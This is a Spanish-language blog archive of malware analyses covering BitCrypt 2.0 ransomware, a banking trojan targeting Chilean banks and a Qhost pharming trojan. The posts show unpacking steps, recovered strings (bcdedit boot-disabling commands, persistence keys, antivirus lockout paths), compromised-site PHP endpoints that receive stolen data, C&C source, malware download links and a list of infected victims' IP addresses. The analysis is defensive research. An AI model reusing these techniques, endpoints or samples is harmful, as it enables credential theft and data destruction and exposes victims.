viernes, 7 de marzo de 2014

CryptoVirus: bitCrypt 2.0

Hace unos días apareció una nota sobre la rotura del cifrado del Ramson bitcrypt, se trata de uno de los tantos Ransomware que cifran archivos. A muy grandes rasgos la nota explica que por un error en la programación del ransom se dejo una clave de cifrado publica lo suficientemente corta como para aplicar criptoanálisis y obtener la clave privada para poder recuperar los archivos cifrados por esta amenaza.

Esta nota fue publicada el 20/02/2014, y los chicos malos no se tardaron en fixear su engendro y volvieron a la carga con la versión bitCrypt 2.0...si si los malos también leen los blog's de seguridad... 
Hace unos día un compañero me acerco una maquina infectada con la versión 2.0, presuntamente se infecto con solo navegar con una PC desactualizada y sin anti-virus.....

Le pase KaV booteando desde un USB y encontramos lo siguiente:



3/5/14 3:32 PM Detected Trojan program Trojan-Ransom.Win32.Blocker.dxgq C:/Documents and Settings/User001/Application Data/NTMoV.exe High

3/5/14 3:33 PM Detected Trojan program HEUR:Exploit.Java.Generic C:/Documents and Settings/User001/Application Data/Sun/Java/Deployment/cache/6.0/3/1807b203-75e412a4 High

3/5/14 3:33 PM Detected Trojan program HEUR:Exploit.Java.Generic C:/Documents and Settings/User001/Application Data/Sun/Java/Deployment/cache/6.0/49/6bfc50f1-36f65919 High

3/5/14 3:33 PM Detected Trojan program Exploit.Java.Agent.hi C:/Documents and Settings/User001/Application Data/Sun/Java/Deployment/cache/6.0/50/5f58af32-7bbf83f4//y/main.class High

3/5/14 3:36 PM Detected Trojan program Trojan-PSW.Win32.Tepfer.thee C:/Documents and Settings/User001/Local Settings/Temp/000104be.exe High

3/5/14 3:36 PM Detected Trojan program Trojan-Ransom.Win32.Blocker.dvck C:/Documents and Settings/User001/Local Settings/Temp/00161458.exe High


Por lo que dado el estado de la PC,  desde mi punto de vista, la victima se infecto por medio de un exploit de Java que le descargo y ejecuto arbitrariamente un Fareit (000104be.exe), y este ultimo descargo el bitCrypt2 (00161458.exe)


Fareit (downloader)

Analisis en VT detección 15/40


Clásico Crypter


Password Stealer

Dinamicamente comprobamos que automáticamente descarga una amenaza (bitCrypt2) desde un sitio presuntamente hackeado.

Analisis en VT


Esta amenaza tiene dos capas de ofuscación, para dificultar su análisis, la primera es un clásico crypter y la segunda esta compactada con ASPack 2.12

Pushad del inicio de la rutina de ASPack





Verificamos con RDG, vale tambien PEid o similar



Para quitar esta capa de ASPack tenemos que encontrar el OEP .

Tenemos que poner un Hardware  BP como word sobre los 4 bytes sobre la data que apunta en ECX (follow in dump), 



Luego ejecutamos con (F9) y obtenemos el BP, avanzamos paso a paso (F7) hasta caer en el OBP



Analysis -> Analyse code


Listo ya estamos en el OBP y procedemos a realizar el DUMP


Usamos ImportRec para arreglar la IAT del dump





El archivo final lo cargo en el Olly para probar que carga todo bien.





A partir de ahora puedo analizar el binario con PE Explorer o IDR sumado al analisis dinámico y entender como funciona.

Strings

00476333   MOV EDX,win-dump.004764A4                 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00476395   PUSH win-dump.004764DC                    ASCII "del ""
004763CD   PUSH win-dump.004764DC                    ASCII "del ""
004763D8   PUSH win-dump.004764F8                    ASCII "del.bat""
00476402   MOV ECX,win-dump.0047650C                 ASCII "del.bat"
0047643A   MOV ECX,win-dump.0047650C                 ASCII "del.bat"
004764A4   ASCII "SOFTWARE\Microso"
004764B4   ASCII "ft\Windows\Curre"
004764C4   ASCII "ntVersion\Run",0
004764DC   ASCII "del "",0
004764EC   ASCII """,0
004764F8   ASCII "del.bat"",0
0047650C   ASCII "del.bat",0
004765D2   MOV EDX,win-dump.004767DC                 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00476625   MOV ECX,win-dump.00476814                 ASCII ".exe"
004766EC   MOV ECX,win-dump.00476814                 ASCII ".exe"
004767DC   ASCII "SOFTWARE\Microso"
004767EC   ASCII "ft\Windows\Curre"
004767FC   ASCII "ntVersion\Run",0
00476814   ASCII ".exe",0
00476824   ASCII """,0
00476830   ASCII "\",0
00476873   MOV EDX,win-dump.00476940                 ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot"
0047687D   MOV EDX,win-dump.00476974                 ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
004768AD   MOV EDX,win-dump.00476940                 ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot"
004768B7   MOV EDX,win-dump.004769B0                 ASCII "SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal"
004768DB   PUSH win-dump.004769E4                    ASCII "/K bcdedit /set {bootmgr} displaybootmenu no"
004768E0   PUSH win-dump.00476A14                    ASCII "cmd.exe"
004768FC   PUSH win-dump.00476A1C                    ASCII "/K bcdedit /set {default} bootstatuspolicy ignoreallfailures"
00476901   PUSH win-dump.00476A14                    ASCII "cmd.exe"


00477D44   ASCII "EncryptComplete",0
00477D5C   ASCII "false",0


004773A9   PUSH win-dump.004774DC                    ASCII "Your computer was infected by BitCrypt v2.0 cryptovirus."
004773C4   PUSH win-dump.00477520                    ASCII "For more information you should find txt file named Bitcrypt.txt on your hard drive."
00477431   MOV EDX,win-dump.00477580                 ASCII "Control Panel\Desktop"
00477453   MOV EDX,win-dump.004775A0                 ASCII "Wallpaper"
00477464   MOV EDX,win-dump.004775A0                 ASCII "Wallpaper"

Archivos elegidos para cifrar.

0459441   ASCII "TCrypt"
00459450   ASCII "*.dbf",0
00459460   ASCII "*.mdb",0
00459470   ASCII "*.mde",0
00459480   ASCII "*.xls",0
00459490   ASCII "*.xlw",0
004594A0   ASCII "*.docx",0
004594B0   ASCII "*.doc",0
004594C0   ASCII "*.cer",0
004594D0   ASCII "*.key",0
004594E0   ASCII "*.rtf",0
004594F0   ASCII "*.xlsm",0
00459500   ASCII "*.xlsx",0
00459510   ASCII "*.txt",0
00459520   ASCII "*.xlc",0
00459530   ASCII "*.docm",0
00459540   ASCII "*.xlk",0
00459550   ASCII "*.text",0
00459560   ASCII "*.ppt",0
00459570   ASCII "*.djvu",0
00459580   ASCII "*.pdf",0
00459590   ASCII "*.lzo",0
004595A0   ASCII "*.djv",0
004595B0   ASCII "*.cdx",0
004595C0   ASCII "*.cdt",0
004595D0   ASCII "*.cdr",0
004595E0   ASCII "*.bpg",0
004595F0   ASCII "*.xfm",0
00459600   ASCII "*.dfm",0
00459610   ASCII "*.pas",0
00459620   ASCII "*.dpk",0
00459630   ASCII "*.dpr",0
00459640   ASCII "*.frm",0
00459650   ASCII "*.vbp",0
00459660   ASCII "*.php",0
00459670   ASCII "*.js",0
00459680   ASCII "*.wri",0
00459690   ASCII "*.css",0
004596A0   ASCII "*.asm",0
004596B0   ASCII "*.jpg",0
004596C0   ASCII "*.jpeg",0
004596D0   ASCII "*.dbx",0
004596E0   ASCII "*.dbt",0
004596F0   ASCII "*.odc",0
00459700   ASCII "*.sql",0
00459710   ASCII "*.abw",0
00459720   ASCII "*.pab",0
00459730   ASCII "*.vsd",0
00459740   ASCII "*.xsf",0
00459750   ASCII "*.xsn",0
00459760   ASCII "*.pps",0
00459770   ASCII "*.lzh",0
00459780   ASCII "*.pgp",0
00459790   ASCII "*.arj",0
004597A0   ASCII "*.gz",0
004597B0   ASCII "*.pst",0
004597C0   ASCII "*.xl",0



No SafeBoot
Las siguientes llaves de registro para XP deshabilita el SafeBoot

"SYSTEM\CurrentControlSet\Control\SafeBoot"
SYSTEM\CurrentControlSet\Control\SafeBoot\Network"
"SYSTEM\CurrentControlSet\Control\SafeBoot"
"SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal"

Aquí para Windows 8 mediante el comando bcdedit

"/K bcdedit /set {bootmgr} displaybootmenu no"
"/K bcdedit /set {default} bootstatuspolicy ignoreallfailures"


Persistencia en el sistema.
El troyano permanecerá en el sistema mientras no se termine de encriptar tos los archivos elegidos, una vez finalizada la tarea, se borrara así mismo y cambiara el fondo de escritorio con un mensaje para la victima.

004765D2   MOV EDX,win-dump.004767DC                 ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
00476625   MOV ECX,win-dump.00476814                 ASCII ".exe"
004766EC   MOV ECX,win-dump.00476814                 ASCII ".exe"



Mensaje mostrado a la Victima.


Instrucciones para el pago y desbloqueo de nuestros archivos.


Sitio para pagar y obtener el decodificador:







Archivo de configuración bitcrypt.ccw creado en %APPDATA% contiene la clave, el bitCryptID y un string que indica si finaliza o no la encripcion, en este caso se encuentra en false.

bitcrypt.ccw 

ElNR6cJQJlfR91ZURM1lDoYpTyo8Sl=zQf6GWe=vnzCyMd5ffbqvduDlChq3iR444dcaDCiYFRV5V3s8gcEm0tn=ffk6T4NqtUm+y5N6teS5q1lWbEfXmVzfVgEvVvYix83zP6lVGKIkrqPDrD5xgyVyqA4kqoX75ZyGK1WL8BG

WIN-217-4772477

false


00477D44   ASCII "EncryptComplete",0

00477D5C   ASCII "false",0

Una vez finalizado el trabajo false cambiara por EncryptComplete.

Nótese que la clave ya no es corta como en el caso descrito en el blog de cassidiancybersecurity por lo que el método de descifrado propuesto ya no sirve.

Solo encontré que esta amenaza ataca al disco donde se encuentra el S.O. instalado, no alcanzando otras unidades mapeadas.
Los archivos una vez cifrados son borrados en forma segura (sobre escritos) y no pueden ser recuperados.



Recomendación: Como siempre, las buenas practicas, de contar con el S.O. actualizado, contar con un antivirus activo y actualizado, que si bien no es garantía de que no nos infectemos, reduciremos dramáticamente la posibilidades de ser infectados. 
Realizar backups regulares de los archivos importantes, en DVD o BlueRay, también valen los discos extremos, asegurándonos de no dejarlos siempre conectados al PC a backupear, debido a que estos backups pueden ser alcanzados por un Ransomware de este estilo.
También se puede contar con una solución de backups en la nube, pero ya entra otro paradigma sobre la privacidad de nuestra información confiada a dicha nube.




Muestra: https://www.dropbox.com/s/urirypb8i1xdae4/BitCrypt2-06-03-14.zip

Sea cuidadoso!


Es todo por el momento.
@Dkavalanche 2014


jueves, 13 de febrero de 2014

Troyano: Informe deuda Gobierno de Chile


Les traigo este troyano Screen Overlay programado en Delphi, el cual roba datos de cuentas bancarias de entidades de Chile. Como novedad, un poco vieja y vetusta.. oldschool como diría el downloader descarga un modulo para inutilizar las actualizaciones o descargas de antivirus con el viejo truco de agregar los sitios en el archivo .host apuntando a la dirección loopback.

E-mail Phishing


Los links aprovechan de una vulnerabilidad de redireccion de url.

hxxp://www.buylebanese.com/authenticate.asp?redirectto=http://www.xxxx.br//envio2/Abrir_DOC.zip

Descargamos la amenaza con malzilla.





Lo subimos a Virus total y descubrimos un indice casi nulo en detecciones 1/47, siendo que solamente esta compactado con UPX. (mal por los muchachos buenos...)




Descarga dos payloads y lo ejecuta, uno es el sound.exe y updateflash.exe






sound.exe Corresponde al troyano bancario Screen Overlay.

V.T. 4/50




Formularios desplegados por la amenaza cuando se vista un determinado URL.

https://www.bancochile.cl/SecurityDevicesAdmin/menuMain.do?
bciimg.bci.cl/sitioseguro/NuevoLogin_act.html',0000h
bci.cl/cl/bci/aplicaciones/seguridad/autenticacion/autenticacionSegundaClave.jsf
https://www.bancochile.cl/bchile-perfilamiento/Process?MID=&AID=LOGIN
https://www.bancosecurity.cl/security/loginsecurity.asp
https://www.bancosecurity.cl/empresas/login/usuario/menu/menuInicio.asp
https://www.bancosecurity.cl/security/cartolaexpress/ba_saldos.asp?
https://empresas.bancosecurity.cl/login-contenido/index.asp
http://www.bci.cl/personas/
www.itau.cl/personas/process.asp?MID=&AID=LOGIN
www.itau.cl/personas/azurian.asp

https://banco.itau.cl/wps/portal/BICPublico/acceso-clientes









Cadenas del troyano (desofuscadas)


.::: Itaú :::. TABELA
=================================
Rut
Clave
Correo
Clave
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
{{{{ Tarjeta de Coordenadas }}}}
[A1]
[A2]
[A3]
[A4]
[A5]
[B1]
[B2]
[B3]
[B4]
[B5]
[C1]
[C2]
[C3]
[C4]
[C5]
[D1]
[D2]
[D3]
[D4]
[D5]
[E1]
[E2]
[E3]
[E4]
[E5]
[F1]
[F2]
[F4]
[F5]
[G1]
[G2]
[G3]
[G4]
[G5]
[H1]
[H2]
[H3]
[H4]
[H5]
[I1]
[I2]
[I3]
[I4]
[I5]
[J1]
[J2]
[J3]
[J4]
[J5]
Gracias por confiar en Itau.cl, ahora ya puede acceder a su cuenta normalmente.
.::: Itaú :::. CORREO
=======================
Correo
Clave
https://banco.itau.cl/wps/portal/BICPublico/acceso-clientes
=======================
Rut
Clave
www.itau.cl/personas/process.asp?MID=&AID=LOGIN
www.itau.cl/personas/azurian.asp
.::: Security :::. TABELA
=================================
Rut
Clave
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
{{{{ Tarjeta de Coordenadas }}}}
[A1]
[A2]
[A3]
[A4]
[A5]
[B1]
[B2]
[B3]
[B4]
[B5]
[C1]
[C2]
[C3]
[C4]
[C5]
[D1]
[D2]
[D3]
[D4]
[D5]
[E1]
[E2]
[E3]
[E4]
[E5]
[F1]
[F2]
[F4]
[F5]
[G1]
[G2]
[G3]
[G4]
[G5]
[H1]
[H2]
[H3]
[H4]
[H5]
[I1]
[I2]
[I3]
[I4]
[I5]
[J1]
[J2]
[J3]
[J4]
[J5]
javascript:daSubmit();
javascript
https://personas.bancosecurity.cl/
=======================
Rut
Clave
frut
clave
.::: Security Persona :::..
lrut
lpass
.::: Security Empresa :::...
https://www.bancosecurity.cl/security/loginsecurity.asp
https://www.bancosecurity.cl/empresas/login/usuario/menu/menuInicio.asp
https://www.bancosecurity.cl/security/cartolaexpress/ba_saldos.asp?
input
entrar
https://empresas.bancosecurity.cl/login-contenido/index.asp
http://www.bci.cl/personas/
=======================
Rut
Clave
=======================
((( TOKEN 2 )))
.::: BCI :::. TOKEN
=======================
((( TOKEN 1 )))
=======================
Serial del Token
=======================
((( TOKEN 3 )))
====================
DIGIPASS 2
DIGIPASS 3
DIGIPASS 4
====================
DIGIPASS 1
www.bancodechile.cl
=======================
Rut
Clave
https://www.bancochile.cl/bchile-perfilamiento/Process?MID=&AID=LOGIN
oft\Windows\Cu
GVideo
SkypeMS
.::: Itaú :::.
.::: BCI :::.
.::: BANCO DE CHILE :::.
pcnome=
http://www.jjsports.com.tw//talk/cache/lop.php
titulo=
texto=
http://www.jaakkootaara.fi/img/kot.php
http://users.jyu.fi/~vitapasa/counter/kot.php
http://www.jaakkootaara.fi/img/nbas.php
http://users.jyu.fi/~vitapasa/counter/lays.php
.exe
.exe
Banco Security
Itaú OnLine Banking
Bci.cl - Personas 
Personas | Banco de Chile
Banca Preferencial | Banco de Chile

El envío de los datos robados es a través de distintos .php en sitios comprometidos.

http://www.jjsports.com.tw//talk/cache/lop.php
http://www.jaakkootaara.fi/img/kot.php
http://users.jyu.fi/~vitapasa/counter/kot.php
http://www.jaakkootaara.fi/img/nbas.php
http://users.jyu.fi/~vitapasa/counter/lays.php

Los datos son grabados en un txt en forma ofuscada:



Aquí desofuscado con un decoder que arme.







updateflash.exe Se ejecuta como una falsa actualización de Adobe Flash la cual intenta interferir en las actualizaciones de los antivirus e inutilizarlos quitando accesos a la carpetas donde se encuentran instalados.

V.T. 8/49








 0049480C 'La instalación de Flash Player ha finalizado'


Lineas agregadas al .host para evitar que los antivirus instalados puedan actualizarse o descargarse. (también quita accesos a este archivo)



Carpetas y archivos a los cuales se le quitara el acceso a todo usuario o grupo.


 0049447C '\\Trend Micro'
 00494494 'TrustedInstaller'
 004944B0 '\\Avira'
 004944C0 '\\Avira\\AntiVir Desktop'
 004944E0 '\\ESET\\ESET NOD32 Antivirus\\ekrn.exe'
 0049450C '\\ESET\\ESET NOD32 Antivirus'
 00494530 '\\ESET'
 00494540 '\\AVAST Software'
 00494558 '\\AVAST Software\\Avast'
 00494578 '\\Common Files\\Mcafee\\Platform'
 004945A0 '\\McAfee\\MSC'
 004945B4 '\\McAfee.com\\Agent'
 004945D0 '\\McAfee'
 004945E0 'C:\\Windows\\System32\\drivers\\etc\\hosts'
 0049462C 'C:\\Windows\\System32\\drivers\\etc\\hosts'




 Rutina que quita los accesos.



Así quedan.






Panel donde se envío la campaña de Phishing:



muestra: https://www.dropbox.com/s/a6wus1509cot0gm/banload%2012-02-14.rar


Es todo por el momento.

@Dkavalanche 2014

lunes, 3 de febrero de 2014

Qhost - Facebook.exe


Hoy les traigo este pequeño troyano Qhost, que realiza pharming local a distintas entidades bancarias latinoamericanas. Este caso me lo envió Xylit0l, así que todos los créditos son para el que me lo entrego servido en bandeja. Gracias Xyli!


Descarga de la amenaza



Analisis en VT con una detección alta por parte de los A.V.





El troyano no tiene capa de ofuscación.



El troyano se copia a la carpeta de windows\temp con el nombre cftmon.exe


   loc_00402781: FileCopy var_18, CStr(Environ("TMP") & "\cftmon.exe")

Persistencia en el sistema.

  loc_00403275: var_3C = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & var_18



Es un troyano muy simple, se comunica con el C&C vía distintos PHP, y estos escriben en archivos de texto.


Public Sub Proc_0_3_4028B0
  loc_004028D2: var_8 = &H4011C8
  loc_00402913: var_3C = "http://www.volkanakyildiz.com/galeri/WebPanel/prueba.php"
  loc_0040291D: var_34 = "http://www.volkanakyildiz.com/galeri/WebPanel/host.txt"
  loc_00402923: Proc_00402AF0(var_60, edx, ecx)
  loc_00402934: var_78 = "\drivers\etc\hosts"
  loc_0040293B: var_80 = 8
  loc_00402942: var_70 = var_60 & "\drivers\etc\hosts"
  loc_00402949: var_60 = "\drivers\etc\hosts"




PHP donde reporta el Troyano

 $Fileusers="users.txt";
 $contador="contador.txt";



  if( $_POST["Datos"] )
  {
  $pDatos=$_POST["Datos"];
     list($ID,$OS)=explode("|",$pDatos);
 
//Leemos
$hfileuser = fopen($Fileusers, "r");
//Almacenamos
$Udatos = fread($hfileuser, filesize($Fileusers));
// Cerramos 
fclose($hfileuser);
if (strpos($Udatos, $ID) === false){
 Escribir($ID,$OS);
 Contador();
echo "El No existe Lo escribo";   //Si no Existe el IDE llamo a escribir
}
  }
  

function Escribir($uID,$uOS){
 global $Fileusers;
 //CPUID=gerg34534;OS=Windows 7;IP=124.1234.2342.213
$IP=$_SERVER["REMOTE_ADDR"];
$hfile= fopen($Fileusers, "a+");
$r= fwrite($hfile,"CPUID=" . $uID . ";OS=" . $uOS . ";IP=" . $IP . PHP_EOL);
fclose($hfile);

 }

  function Contador(){
  global $contador;
 // Abrimos el archivo para solamente leerlo (r de read)
$abre_visitas = fopen($contador, "r");
// Leemos el contenido del archivo
$total = fread($abre_visitas, filesize($contador));
// Cerramos el archivo
fclose($abre_visitas);

// Abrimos nuevamente el archivo
$abre_visitas = fopen($contador, "w");
// Sumamos 1 nueva visita
$total = $total + 1;

// Y reemplazamos por la nueva cantidad de visitas 
$grabar_visitas = fwrite($abre_visitas, $total);
// Cerramos la conexión al archivo
fclose($abre_visitas);

 }

?>



Panel de Login del Comando y Control



Panel donde el botmaster cargara el archivo host para el pharming, este panel no esta securizado, se puede acceder directamente sin pasar por el login... cosa de locos...



Shell que se subió al sitio comprometido para tomar el control del servidor.


El listado de usuarios infectados se encuentra en un archivo txt (usuarios.txt)

PHP el cual lista los usuarios:


$inputfile = file("users.txt");

$data_lines = array();
foreach ($inputfile as $line)
{
    $data_lines[] = explode(";", $line);
}

//Get column headers.
$first_line = array();
foreach ($data_lines[0] as $dl)
{
    $first_line[] = explode("=", $dl);
}
$headers = array();
foreach ($first_line as $fl)
{
    $headers[] = $fl[0];
}

Listado

CPUID=;OS=Windows 7 Enterprise;IP=122.166.231.83
CPUID=;OS=Windows 7 Enterprise;IP=122.166.231.83
CPUID=0FABFBFF000206D7;OS=Microsoft Windows XP;IP=4.31.163.2
CPUID=0FABFBFF000106A5;OS=Microsoft Windows XP;IP=4.31.163.2
CPUID=BFEBFBFF0001067A;OS=Windows 7 Ultimate;IP=181.160.123.96
CPUID=BFEBFBFF0001067A, BFEBFBFF0001067A;OS=Microsoft Windows XP;IP=186.34.14.218
CPUID=3FEBF9FF00000F12;OS=Microsoft Windows XP;IP=181.160.22.215
CPUID=BFE9FBFF000006EC;OS=Windows 7 Professional;IP=179.56.32.63
CPUID=BFE9FBFF000106CA;OS=Microsoft Windows XP;IP=201.239.140.115
CPUID=078BFBFD00000623;OS=Microsoft Windows XP;IP=66.129.99.119
CPUID=078BFBFF00020FC2;OS=Microsoft Windows XP;IP=186.104.202.117
CPUID=078BFBFF00100F62;OS=Microsoft Windows XP;IP=190.101.28.187
CPUID=078BFBFD00000F61;OS=Microsoft Windows XP;IP=66.187.149.88
CPUID=BFEBFBFF000306A9;OS=Windows 7 Enterprise;IP=163.247.60.12
CPUID=0383F9FF00000673;OS=Microsoft Windows XP;IP=143.215.130.105
CPUID=078BFBFF00100F63;OS=Windows 8 Pro;IP=190.44.82.162
CPUID=078BFBFF00100F23;OS=Microsoft Windows XP;IP=72.12.209.146
CPUID=BFEBFBFF00020652;OS=Microsoft Windows XP;IP=186.9.71.164
CPUID=BFEBFBFF00000F65;OS=Microsoft Windows XP;IP=186.104.236.120
CPUID=;OS=Microsoft Windows XP;IP=176.31.181.165
CPUID=BFEBFBFF000006FD;OS=Microsoft Windows XP;IP=200.14.137.67
CPUID=178BFBFF00500F20;OS=Windows 8 Single Language;IP=190.22.78.182
CPUID=0781ABF900000633;OS=Microsoft Windows XP;IP=66.249.82.231
CPUID=BFEBFBFF000206A7;OS=Windows 7 Professional;IP=181.73.97.84
CPUID=;OS=Microsoft Windows XP;IP=216.232.78.104
CPUID=;OS=Microsoft Windows XP;IP=194.94.127.23
CPUID=BFEBFBFF000106CA;OS=Windows 7 Starter;IP=186.104.131.128
CPUID=;OS=Microsoft Windows XP;IP=66.215.81.155
CPUID=BFEBFBFF000006F2;OS=Microsoft Windows XP;IP=200.104.168.40
CPUID=078BFBFF00600F12;OS=Windows 7 Professional N;IP=122.166.184.37
CPUID=0F8BFBFF000006FB;OS=Microsoft Windows XP;IP=95.26.62.147
CPUID=;OS=Microsoft Windows XP;IP=216.232.78.104
CPUID=;OS=Windows 7 Professional;IP=74.55.187.42
CPUID=;OS=Microsoft Windows XP;IP=74.55.187.42
CPUID=BFEBFBFF000006F2, 0000000000000000;OS=Microsoft Windows XP;IP=187.133.146.104


Como puede verse no son muchos los usuarios infectados, quizás por la taza de detección por parte de los antivirus .

Zip encontrado en el servidor con el kit del panel del comando y control.





Es todo por el momento.

@Dkavalanche 2014



 Hola, me mudé a medium .... nos vemos!!! FELIZ 2022!!!